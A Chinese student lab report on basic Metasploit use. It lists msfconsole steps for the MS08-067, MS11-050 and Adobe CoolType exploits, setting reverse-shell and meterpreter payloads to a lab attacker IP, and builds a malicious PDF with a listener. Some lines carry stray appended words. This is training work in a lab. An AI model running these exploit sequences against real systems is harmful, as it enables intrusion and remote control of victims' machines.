2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用
1、基础问题回答
用本身的话解释什么是exploit,payload,encode
- exploit:利用靶机系统中的一些漏洞进行攻击的过程,除去前期准备的工做,这一步是实施攻击。
- payload:载荷,将病毒代码打包成程序等形式,配合咱们准备好的漏洞传输。
- encode:对payload进行加密假装,为他打掩护。
2、实践过程
1.Windows服务渗透攻击——MS08-067安全漏洞
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use exploit/windows/smb/ms08_067_netapihtml
msf exploit(ms08_067_netapi) > show payloadsshell
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连windows
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ipapi
msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口浏览器
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定安全
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高网络
msf exploit(ms08_067_netapi) > exploit //攻击tcp
2.浏览器渗透攻击——MS11-050
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement网站
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回连加密
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit
- 问题:这里记录下问题,这个靶机那边ie6浏览器访问网站时一直报404,网络是链接好的,跟kali能够ping通,版本也没有问题,访问以后kali这边就会提示如上图,不知道为何,这个问题也一直没有解决。。。(甚至直接拷贝了成功同窗的xp虚拟机过来也不对)。
3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
在kali上输入back退出当前模块,进入监听模块,输入如下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向链接
msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(handler) > set LPORT 5213 //攻击端口固定
msf exploit(handler) > exploit
4.应用任何一个辅助模块。
- 使用scanner/http/prev_dir_same_name_file模块
该模块识别第一个父目录中与给定目录路径具备相同名称的文件。 示例:PATH为Test / backup / files /将查找Test路径下文件/backup/files.ext,.ext为设定的文件类型。
- 使用auxiliary/scanner/portscan/syn模块
该模块使用发送TCP SYN标志的方式探测开放的端口。下面是我扫描到了个人靶机、
3、离实战还缺些什么技术或步骤?
如何将后门文件安全传输或者了解靶机漏洞状况,这个是我认为距离实战有差距的地方。
4、实验总结
此次的实验让我感受又距离实际操做进了一步,应用到了许多常见的漏洞。可是咱们仍是比较局限于msf的一些模块,并且把生成的文件图标啊弄到靶机上也比较难,因此期待下一次的实验能有新的突破。
- 1. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 2. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 3. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 4. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 5. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 6. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 7. 20155308『网络对抗技术』Exp5 MSF基础应用
- 8. 2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用
- 9. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
- 10. 2018-2019-2 网络对抗技术 20165230 Exp5 MSF基础应用
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • 互联网系统应用架构基础分析 - 红包项目实战
- • TiDB 在摩拜单车在线数据业务的应用和实践
- • Docker容器实战(一) - 封神Server端技术
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 2. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 3. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 4. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 5. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 6. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 7. 20155308『网络对抗技术』Exp5 MSF基础应用
- 8. 2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用
- 9. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
- 10. 2018-2019-2 网络对抗技术 20165230 Exp5 MSF基础应用